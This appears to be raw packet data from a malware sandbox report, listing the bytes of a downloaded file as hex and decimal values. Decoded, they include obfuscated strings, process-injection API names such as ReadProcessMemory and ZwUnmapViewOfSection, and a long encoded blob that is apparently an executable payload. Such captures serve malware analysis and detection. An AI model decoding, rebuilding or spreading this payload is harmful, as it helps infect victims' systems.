                    2021-10-26 16:59:46 UTC4505INData Raw: 33 32 20 32 33 36 20 31 36 33 20 31 36 36 20 32 33 36 20 31 36 33 20 31 38 36 20 32 33 36 20 31 36 33 20 31 35 30 20 32 33 36 20 31 36 33 20 31 33 38 20 32 33 36 20 31 36 33 20 31 33 33 20 32 33 36 20 31 36 34 20 31 33 35 20 32 33 36 20 31 36 33 20 31 33 37 20 32 33 36 20 31 36 33 20 31 37 38 20 32 33 36 20 31 36 33 20 31 33 32 20 32 33 36 20 31 36 33 20 31 33 33 20 32 33 36 20 31 36 33 20 31 33 37 20 32 33 36 20 31 36 33 20 31 33 30 20 32 33 36 20 31 36 33 20 31 33 37 20 32 33 36 20 31 36 33 20 31 38 38 20 30 20 32 32 37 20 31 36 34 20 31 38 39 20 32 32 37 20 31 36 34 20 31 35 32 20 32 32 37 20 31 36 34 20 31 36 38 20 32 32 37 20 31 36 34 20 31 38 36 20 32 32 37 20 31 36 34 20 31 38 38 20 32 32 37 20 31 36 34 20 31 34 32 20 32 32 37 20 31 36 34 20 31 33
                    Data Ascii: 32 236 163 166 236 163 186 236 163 150 236 163 138 236 163 133 236 164 135 236 163 137 236 163 178 236 163 132 236 163 133 236 163 137 236 163 130 236 163 137 236 163 188 0 227 164 189 227 164 152 227 164 168 227 164 186 227 164 188 227 164 142 227 164 13
                    2021-10-26 16:59:46 UTC4506INData Raw: 31 34 34 20 32 33 34 20 31 38 31 20 31 34 35 20 32 33 34 20 31 38 31 20 31 34 34 20 32 33 34 20 31 38 31 20 31 35 36 20 32 33 34 20 31 38 31 20 31 38 39 20 32 33 34 20 31 38 31 20 31 37 38 20 32 33 34 20 31 38 31 20 31 38 38 20 30 20 32 30 37 20 31 37 32 20 32 30 37 20 31 37 32 20 32 30 38 20 31 37 38 20 32 30 37 20 31 37 34 20 32 30 38 20 31 34 38 20 32 30 38 20 31 33 37 20 32 30 38 20 31 35 39 20 32 30 38 20 31 33 39 20 32 30 37 20 31 37 38 20 32 30 37 20 31 37 32 20 32 30 38 20 31 37 35 20 32 30 38 20 31 36 37 20 32 30 37 20 31 37 38 20 32 30 37 20 31 37 31 20 32 30 37 20 31 38 38 20 30 20 32 33 32 20 31 33 30 20 31 38 37 20 32 33 32 20 31 32 39 20 31 38 34 20 32 33 32 20 31 33 30 20 31 35 32 20 32 33 32 20 31 32 39 20 31 38 37 20 32 33 32 20 31 33 30
                    Data Ascii: 144 234 181 145 234 181 144 234 181 156 234 181 189 234 181 178 234 181 188 0 207 172 207 172 208 178 207 174 208 148 208 137 208 159 208 139 207 178 207 172 208 175 208 167 207 178 207 171 207 188 0 232 130 187 232 129 184 232 130 152 232 129 187 232 130
                    2021-10-26 16:59:46 UTC4507INData Raw: 35 36 20 31 38 39 20 32 32 38 20 31 35 37 20 31 35 31 20 32 32 38 20 31 35 37 20 31 34 35 20 32 32 38 20 31 35 37 20 31 37 31 20 32 32 38 20 31 35 37 20 31 38 33 20 32 32 38 20 31 35 36 20 31 38 36 20 32 32 38 20 31 35 37 20 31 36 39 20 32 32 38 20 31 35 37 20 31 37 38 20 32 32 38 20 31 35 36 20 31 38 39 20 30 20 32 33 35 20 31 37 35 20 31 37 36 20 32 33 35 20 31 37 35 20 31 37 31 20 32 33 35 20 31 37 35 20 31 37 31 20 32 33 35 20 31 37 35 20 31 32 39 20 32 33 35 20 31 37 35 20 31 35 37 20 32 33 35 20 31 37 35 20 31 32 39 20 32 33 35 20 31 37 35 20 31 36 31 20 32 33 35 20 31 37 34 20 31 38 37 20 32 33 35 20 31 37 35 20 31 38 35 20 32 33 35 20 31 37 35 20 31 33 31 20 32 33 35 20 31 37 35 20 31 35 32 20 32 33 35 20 31 37 35 20 31 35 37 20 32 33 35 20 31 37
                    Data Ascii: 56 189 228 157 151 228 157 145 228 157 171 228 157 183 228 156 186 228 157 169 228 157 178 228 156 189 0 235 175 176 235 175 171 235 175 171 235 175 129 235 175 157 235 175 129 235 175 161 235 174 187 235 175 185 235 175 131 235 175 152 235 175 157 235 17
                    2021-10-26 16:59:46 UTC4509INData Raw: 30 20 32 31 30 20 31 36 32 20 32 31 31 20 31 34 34 20 32 31 30 20 31 36 36 20 32 31 30 20 31 38 39 20 32 31 30 20 31 36 35 20 32 31 30 20 31 34 33 20 32 31 30 20 31 34 31 20 32 31 30 20 31 34 32 20 32 31 30 20 31 34 35 20 32 31 30 20 31 39 31 20 32 31 31 20 31 34 32 20 32 31 30 20 31 34 37 20 32 31 30 20 31 34 30 20 32 31 31 20 31 32 39 20 32 31 30 20 31 38 39 20 30 20 32 31 38 20 31 37 30 20 32 31 37 20 31 38 35 20 32 31 38 20 31 39 30 20 32 31 37 20 31 38 37 20 32 31 37 20 31 38 35 20 32 31 38 20 31 35 36 20 32 31 39 20 31 32 38 20 32 31 38 20 31 34 30 20 32 31 38 20 31 32 38 20 32 31 38 20 31 34 31 20 32 31 37 20 31 38 39 20 32 31 39 20 31 32 38 20 32 31 38 20 31 32 38 20 32 31 37 20 31 38 36 20 32 31 37 20 31 38 39 20 30 20 32 32 35 20 31 32 39 20 31
                    Data Ascii: 0 210 162 211 144 210 166 210 189 210 165 210 143 210 141 210 142 210 145 210 191 211 142 210 147 210 140 211 129 210 189 0 218 170 217 185 218 190 217 187 217 185 218 156 219 128 218 140 218 128 218 141 217 189 219 128 218 128 217 186 217 189 0 225 129 1
                    2021-10-26 16:59:46 UTC4510INData Raw: 20 31 33 35 20 32 32 36 20 31 37 31 20 31 37 30 20 32 32 36 20 31 37 31 20 31 37 32 20 32 32 36 20 31 37 30 20 31 38 34 20 32 32 36 20 31 37 31 20 31 33 36 20 32 32 36 20 31 37 30 20 31 38 37 20 32 32 36 20 31 37 30 20 31 38 38 20 32 32 36 20 31 37 30 20 31 38 39 20 32 32 36 20 31 37 31 20 31 33 36 20 32 32 36 20 31 37 31 20 31 36 37 20 32 32 36 20 31 37 30 20 31 39 30 20 32 32 36 20 31 37 30 20 31 38 39 20 32 32 36 20 31 37 30 20 31 39 30 20 30 20 32 32 34 20 31 37 34 20 31 33 31 20 32 32 34 20 31 37 34 20 31 37 35 20 32 32 34 20 31 37 34 20 31 33 31 20 32 32 34 20 31 37 34 20 31 32 38 20 32 32 34 20 31 37 35 20 31 32 38 20 32 32 34 20 31 37 34 20 31 35 35 20 32 32 34 20 31 37 34 20 31 37 32 20 32 32 34 20 31 37 34 20 31 33 30 20 32 32 34 20 31 37 34 20
                    Data Ascii: 135 226 171 170 226 171 172 226 170 184 226 171 136 226 170 187 226 170 188 226 170 189 226 171 136 226 171 167 226 170 190 226 170 189 226 170 190 0 224 174 131 224 174 175 224 174 131 224 174 128 224 175 128 224 174 155 224 174 172 224 174 130 224 174
                    2021-10-26 16:59:46 UTC4511INData Raw: 31 38 39 20 32 32 38 20 31 39 30 20 31 38 35 20 32 32 38 20 31 39 31 20 31 34 38 20 32 32 38 20 31 39 30 20 31 38 35 20 32 32 38 20 31 39 31 20 31 37 32 20 32 32 38 20 31 39 31 20 31 38 31 20 32 32 38 20 31 39 30 20 31 38 36 20 32 32 38 20 31 39 31 20 31 38 32 20 32 32 38 20 31 39 31 20 31 37 33 20 32 32 38 20 31 39 30 20 31 39 30 20 30 20 32 31 33 20 31 35 36 20 32 31 34 20 31 36 33 20 32 31 33 20 31 36 31 20 32 31 33 20 31 36 34 20 32 31 33 20 31 36 33 20 32 31 34 20 31 34 35 20 32 31 34 20 31 33 30 20 32 31 33 20 31 36 33 20 32 31 33 20 31 36 33 20 32 31 34 20 31 34 36 20 32 31 33 20 31 36 30 20 32 31 33 20 31 36 33 20 32 31 33 20 31 35 39 20 32 31 33 20 31 36 30 20 32 31 33 20 31 39 30 20 30 20 32 32 37 20 31 32 39 20 31 34 33 20 32 32 37 20 31 32 39
                    Data Ascii: 189 228 190 185 228 191 148 228 190 185 228 191 172 228 191 181 228 190 186 228 191 182 228 191 173 228 190 190 0 213 156 214 163 213 161 213 164 213 163 214 145 214 130 213 163 213 163 214 146 213 160 213 163 213 159 213 160 213 190 0 227 129 143 227 129
                    2021-10-26 16:59:46 UTC4513INData Raw: 36 38 20 31 36 37 20 32 33 31 20 31 36 38 20 31 37 34 20 32 33 31 20 31 36 39 20 31 32 39 20 32 33 31 20 31 36 38 20 31 34 32 20 32 33 31 20 31 36 38 20 31 35 39 20 32 33 31 20 31 36 38 20 31 35 30 20 32 33 31 20 31 36 38 20 31 34 39 20 32 33 31 20 31 36 39 20 31 32 39 20 32 33 31 20 31 36 39 20 31 33 30 20 32 33 31 20 31 36 39 20 31 34 35 20 32 33 31 20 31 36 38 20 31 34 36 20 32 33 31 20 31 36 38 20 31 39 31 20 30 20 32 33 31 20 31 36 39 20 31 37 33 20 32 33 31 20 31 36 39 20 31 34 33 20 32 33 31 20 31 36 38 20 31 39 31 20 32 33 31 20 31 36 39 20 31 37 35 20 32 33 31 20 31 36 38 20 31 39 31 20 32 33 31 20 31 36 38 20 31 39 31 20 32 33 31 20 31 36 39 20 31 36 35 20 32 33 31 20 31 36 39 20 31 37 38 20 32 33 31 20 31 36 38 20 31 39 31 20 32 33 31 20 31 36
                    Data Ascii: 68 167 231 168 174 231 169 129 231 168 142 231 168 159 231 168 150 231 168 149 231 169 129 231 169 130 231 169 145 231 168 146 231 168 191 0 231 169 173 231 169 143 231 168 191 231 169 175 231 168 191 231 168 191 231 169 165 231 169 178 231 168 191 231 16
                    2021-10-26 16:59:46 UTC4514INData Raw: 20 31 31 34 20 30 20 31 30 31 20 30 20 39 37 20 30 20 31 30 30 20 30 20 36 37 20 30 20 31 31 31 20 30 20 31 31 30 20 30 20 31 31 36 20 30 20 31 30 31 20 30 20 31 32 30 20 30 20 31 31 36 20 30 20 30 20 33 35 20 38 32 20 30 20 31 30 31 20 30 20 39 37 20 30 20 31 30 30 20 30 20 38 30 20 30 20 31 31 34 20 30 20 31 31 31 20 30 20 39 39 20 30 20 31 30 31 20 30 20 31 31 35 20 30 20 31 31 35 20 30 20 37 37 20 30 20 31 30 31 20 30 20 31 30 39 20 30 20 31 31 31 20 30 20 31 31 34 20 30 20 31 32 31 20 30 20 30 20 34 31 20 39 30 20 30 20 31 31 39 20 30 20 38 35 20 30 20 31 31 30 20 30 20 31 30 39 20 30 20 39 37 20 30 20 31 31 32 20 30 20 38 36 20 30 20 31 30 35 20 30 20 31 30 31 20 30 20 31 31 39 20 30 20 37 39 20 30 20 31 30 32 20 30 20 38 33 20 30 20 31 30 31 20 30
                    Data Ascii: 114 0 101 0 97 0 100 0 67 0 111 0 110 0 116 0 101 0 120 0 116 0 0 35 82 0 101 0 97 0 100 0 80 0 114 0 111 0 99 0 101 0 115 0 115 0 77 0 101 0 109 0 111 0 114 0 121 0 0 41 90 0 119 0 85 0 110 0 109 0 97 0 112 0 86 0 105 0 101 0 119 0 79 0 102 0 83 0 101 0
                    2021-10-26 16:59:46 UTC4515INData Raw: 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 34 37 20 30 20 34 37 20 30 20 35 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 36 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36
                    Data Ascii: 0 65 0 65 0 65 0 47 0 47 0 56 0 65 0 65 0 76 0 103 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 81 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 6
                    2021-10-26 16:59:46 UTC4517INData Raw: 35 20 30 20 31 30 35 20 30 20 31 30 39 20 30 20 38 32 20 30 20 31 31 35 20 30 20 31 31 39 20 30 20 31 32 32 20 30 20 31 31 38 20 30 20 35 34 20 30 20 39 38 20 30 20 37 37 20 30 20 31 31 33 20 30 20 37 35 20 30 20 39 30 20 30 20 37 31 20 30 20 31 32 32 20 30 20 38 35 20 30 20 31 30 39 20 30 20 31 30 38 20 30 20 31 30 36 20 30 20 39 37 20 30 20 36 37 20 30 20 31 31 35 20 30 20 31 31 32 20 30 20 31 30 37 20 30 20 39 38 20 30 20 37 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35
                    Data Ascii: 5 0 105 0 109 0 82 0 115 0 119 0 122 0 118 0 54 0 98 0 77 0 113 0 75 0 90 0 71 0 122 0 85 0 109 0 108 0 106 0 97 0 67 0 115 0 112 0 107 0 98 0 77 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65
                    2021-10-26 16:59:46 UTC4518INData Raw: 33 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 31 31 39 20 30 20 31 31 39 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 37 32 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20
                    Data Ascii: 3 0 81 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 66 0 119 0 119 0 119 0 65 0 65 0 72 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65
                    2021-10-26 16:59:46 UTC4519INData Raw: 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 31 39 20 30 20 36 37 20 30 20 35 33 20 30 20 31 32 31 20 30 20 39 39 20 30 20 35 31 20 30 20 37 34 20 30 20 31 30 36 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 37 31 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 38 31 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 38 39 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20
                    Data Ascii: 65 0 65 0 65 0 65 0 65 0 81 0 65 0 65 0 65 0 119 0 67 0 53 0 121 0 99 0 51 0 74 0 106 0 65 0 65 0 65 0 65 0 68 0 71 0 69 0 65 0 65 0 65 0 68 0 81 0 65 0 81 0 65 0 65 0 89 0 103 0 65 0 65 0 65 0 79 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0
                    2021-10-26 16:59:46 UTC4521INData Raw: 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30
                    Data Ascii: 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0
                    2021-10-26 16:59:46 UTC4522INData Raw: 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 38 37 20 30 20 37 36 20 30 20 35 35 20 30 20 37 30 20 30 20 37 30 20 30 20 38 37 20 30 20 37 37 20 30 20 34 37 20 30 20 39 30 20 30 20 31 30 39 20 30 20 31 30 35 20 30 20 38 34 20 30 20 37 39 20 30 20 37 35 20 30 20 36 36 20 30 20 34 33 20 30 20 31 31 35 20 30 20 31 31 32 20 30 20 37 38 20 30 20 36 39 20 30 20 37 34 20 30 20 31 30 39 20 30 20 36 38 20 30 20 35 35 20 30 20 39 38 20 30 20 36 35 20 30 20 31 31 37 20 30 20 31 30 32 20 30 20 37 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 31 34 20 30 20 31 32 32 20 30 20 31 30 39 20 30 20 38 39 20 30 20 31 32 32 20 30 20 31 31 39 20 30 20 38 31 20 30 20 34
                    Data Ascii: 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 70 0 87 0 76 0 55 0 70 0 70 0 87 0 77 0 47 0 90 0 109 0 105 0 84 0 79 0 75 0 66 0 43 0 115 0 112 0 78 0 69 0 74 0 109 0 68 0 55 0 98 0 65 0 117 0 102 0 73 0 65 0 65 0 65 0 65 0 114 0 122 0 109 0 89 0 122 0 119 0 81 0 4
                    2021-10-26 16:59:46 UTC4523INData Raw: 20 30 20 36 35 20 30 20 36 35 20 30 20 34 33 20 30 20 36 39 20 30 20 31 30 35 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 39 20 30 20 31 30 34 20 30 20 37 33 20 30 20 36 38 20 30 20 35 32 20 30 20 38 35 20 30 20 31 31 38 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 34 38 20 30 20 38 35 20 30 20 38 31 20 30 20 31 30 35 20 30 20 31 32 32 20 30 20 35 31 20 30 20 38 31 20 30 20 31 31 39 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 35 35 20 30 20 31 30 32 20 30 20 38 39 20 30 20 39 37 20 30 20 37 39 20 30 20 31 31 39 20 30 20 36 38 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 34 37 20 30 20 31 30 30 20 30 20 31 30 34 20 30 20 36 38 20 30 20 36 36 20 30
                    Data Ascii: 0 65 0 65 0 43 0 69 0 105 0 119 0 65 0 65 0 65 0 69 0 104 0 73 0 68 0 52 0 85 0 118 0 65 0 103 0 65 0 65 0 105 0 48 0 85 0 81 0 105 0 122 0 51 0 81 0 119 0 85 0 65 0 65 0 68 0 55 0 102 0 89 0 97 0 79 0 119 0 68 0 65 0 65 0 68 0 47 0 100 0 104 0 68 0 66 0
                    2021-10-26 16:59:46 UTC4525INData Raw: 35 20 30 20 37 37 20 30 20 31 30 30 20 30 20 38 32 20 30 20 34 39 20 30 20 31 31 33 20 30 20 36 35 20 30 20 38 30 20 30 20 35 36 20 30 20 38 36 20 30 20 35 31 20 30 20 37 37 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 31 20 30 20 31 31 32 20 30 20 31 31 30 20 30 20 38 35 20 30 20 38 30 20 30 20 35 36 20 30 20 38 36 20 30 20 31 30 33 20 30 20 37 37 20 30 20 37 30 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 36 38 20 30 20 34 37 20 30 20 37 30 20 30 20 38 38 20 30 20 31 32 32 20 30 20 36 36 20 30 20 38 31 20 30 20 36 35 20 30 20 36 38 20 30 20 31 31 32 20 30 20 39 39 20 30 20 31 30 32 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 35 30 20 30 20 39 37 20 30 20 36 38 20 30 20 38 30 20 30 20 38 34 20 30 20 36 38 20 30 20 34 37 20
                    Data Ascii: 5 0 77 0 100 0 82 0 49 0 113 0 65 0 80 0 56 0 86 0 51 0 77 0 66 0 65 0 65 0 71 0 112 0 110 0 85 0 80 0 56 0 86 0 103 0 77 0 70 0 65 0 65 0 70 0 68 0 47 0 70 0 88 0 122 0 66 0 81 0 65 0 68 0 112 0 99 0 102 0 47 0 47 0 47 0 50 0 97 0 68 0 80 0 84 0 68 0 47
                    2021-10-26 16:59:46 UTC4526INData Raw: 20 39 37 20 30 20 37 30 20 30 20 31 31 39 20 30 20 36 35 20 30 20 34 33 20 30 20 37 30 20 30 20 31 31 33 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 34 33 20 30 20 35 31 20 30 20 31 31 39 20 30 20 38 36 20 30 20 36 38 20 30 20 34 37 20 30 20 31 30 30 20 30 20 31 30 34 20 30 20 36 38 20 30 20 34 37 20 30 20 37 30 20 30 20 39 39 20 30 20 38 34 20 30 20 36 36 20 30 20 38 31 20 30 20 36 35 20 30 20 36 38 20 30 20 34 37 20 30 20 31 31 36 20 30 20 31 30 36 20 30 20 31 31 39 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 34 37 20 30 20 37 30 20 30 20 38 36 20 30 20 31 32 32 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 38 20 30 20 31 31 32 20 30 20 31 31 32 20 30 20 31 30 32 20 30 20 35
                    Data Ascii: 97 0 70 0 119 0 65 0 43 0 70 0 113 0 119 0 65 0 65 0 65 0 65 0 43 0 51 0 119 0 86 0 68 0 47 0 100 0 104 0 68 0 47 0 70 0 99 0 84 0 66 0 81 0 65 0 68 0 47 0 116 0 106 0 119 0 69 0 65 0 65 0 68 0 47 0 70 0 86 0 122 0 65 0 81 0 65 0 68 0 112 0 112 0 102 0 5
                    2021-10-26 16:59:46 UTC4527INData Raw: 20 30 20 31 31 31 20 30 20 34 38 20 30 20 39 37 20 30 20 36 37 20 30 20 36 38 20 30 20 37 34 20 30 20 38 31 20 30 20 36 35 20 30 20 36 38 20 30 20 34 37 20 30 20 31 30 30 20 30 20 38 31 20 30 20 31 30 33 20 30 20 31 32 32 20 30 20 35 30 20 30 20 34 37 20 30 20 35 36 20 30 20 38 36 20 30 20 37 36 20 30 20 37 37 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 31 31 35 20 30 20 35 37 20 30 20 37 32 20 30 20 37 37 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 31 31 38 20 30 20 31 31 39 20 30 20 31 30 34 20 30 20 31 30 32 20 30 20 39 30 20 30 20 34 38 20 30 20 37 33 20 30 20 35 32 20 30 20 34 39 20 30 20 37 30 20 30 20 35 33 20 30 20 37 30 20 30 20 36 36 20 30 20 38 37 20 30 20 34 37 20 30 20 31 32 30 20 30 20 38 35
                    Data Ascii: 0 111 0 48 0 97 0 67 0 68 0 74 0 81 0 65 0 68 0 47 0 100 0 81 0 103 0 122 0 50 0 47 0 56 0 86 0 76 0 77 0 66 0 65 0 65 0 73 0 115 0 57 0 72 0 77 0 66 0 65 0 65 0 73 0 118 0 119 0 104 0 102 0 90 0 48 0 73 0 52 0 49 0 70 0 53 0 70 0 66 0 87 0 47 0 120 0 85
                    2021-10-26 16:59:46 UTC4529INData Raw: 20 30 20 34 39 20 30 20 34 39 20 30 20 35 34 20 30 20 37 39 20 30 20 31 30 36 20 30 20 35 31 20 30 20 38 31 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 38 38 20 30 20 34 39 20 30 20 35 33 20 30 20 39 38 20 30 20 31 32 31 20 30 20 39 39 20 30 20 37 33 20 30 20 36 39 20 30 20 36 35 20 30 20 37 30 20 30 20 37 38 20 30 20 38 38 20 30 20 31 30 35 20 30 20 34 37 20 30 20 31 30 34 20 30 20 31 31 31 20 30 20 35 34 20 30 20 37 37 20 30 20 38 32 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 38 30 20 30 20 37 33 20 30 20 34 37 20 30 20 34 33 20 30 20 31 30 33 20 30 20 37 32 20 30 20 38 31 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 37 37 20 30 20 35 37 20 30 20 31 31 35 20 30 20 35 33 20 30 20 38 38 20 30 20 31 30 34 20 30 20 31 32 30
                    Data Ascii: 0 49 0 49 0 54 0 79 0 106 0 51 0 81 0 81 0 65 0 65 0 88 0 49 0 53 0 98 0 121 0 99 0 73 0 69 0 65 0 70 0 78 0 88 0 105 0 47 0 104 0 111 0 54 0 77 0 82 0 65 0 65 0 73 0 80 0 73 0 47 0 43 0 103 0 72 0 81 0 103 0 65 0 65 0 77 0 57 0 115 0 53 0 88 0 104 0 120
                    2021-10-26 16:59:46 UTC4530INData Raw: 37 37 20 30 20 31 30 37 20 30 20 38 33 20 30 20 36 35 20 30 20 36 36 20 30 20 36 36 20 30 20 37 39 20 30 20 35 36 20 30 20 31 31 32 20 30 20 35 36 20 30 20 35 35 20 30 20 35 36 20 30 20 37 38 20 30 20 38 34 20 30 20 38 36 20 30 20 31 30 38 20 30 20 31 30 32 20 30 20 34 37 20 30 20 37 30 20 30 20 39 37 20 30 20 36 38 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 37 20 30 20 37 36 20 30 20 31 30 30 20 30 20 36 37 20 30 20 38 31 20 30 20 38 31 20 30 20 31 30 35 20 30 20 34 37 20 30 20 31 30 35 20 30 20 37 36 20 30 20 35 31 20 30 20 34 33 20 30 20 31 30 33 20 30 20 36 39 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 34 20 30 20 31 30 32 20 30 20 35 37 20 30 20 34 38 20 30 20 37 33 20 30 20 34 33 20 30 20 31 31 35 20 30
                    Data Ascii: 77 0 107 0 83 0 65 0 66 0 66 0 79 0 56 0 112 0 56 0 55 0 56 0 78 0 84 0 86 0 108 0 102 0 47 0 70 0 97 0 68 0 65 0 81 0 65 0 67 0 76 0 100 0 67 0 81 0 81 0 105 0 47 0 105 0 76 0 51 0 43 0 103 0 69 0 81 0 65 0 65 0 65 0 104 0 102 0 57 0 48 0 73 0 43 0 115 0
                    2021-10-26 16:59:46 UTC4531INData Raw: 32 20 30 20 39 38 20 30 20 31 30 36 20 30 20 31 31 31 20 30 20 37 38 20 30 20 31 30 36 20 30 20 35 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 31 31 36 20 30 20 35 37 20 30 20 36 37 20 30 20 36 38 20 30 20 38 30 20 30 20 36 35 20 30 20 37 39 20 30 20 38 35 20 30 20 39 39 20 30 20 39 39 20 30 20 31 30 35 20 30 20 38 35 20 30 20 38 38 20 30 20 39 39 20 30 20 31 30 35 20 30 20 38 35 20 30 20 38 38 20 30 20 31 31 31 20 30 20 31 30 35 20 30 20 38 35 20 30 20 38 38 20 30 20 31 30 33 20 30 20 31 32 30 20 30 20 34 38 20 30 20 38 38 20 30 20 31 30 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 31 30 38 20 30 20 37 30 20 30 20 35 30 20 30 20 37 33 20 30 20 31 30 38 20 30 20 37 30 20 30 20 35 37 20
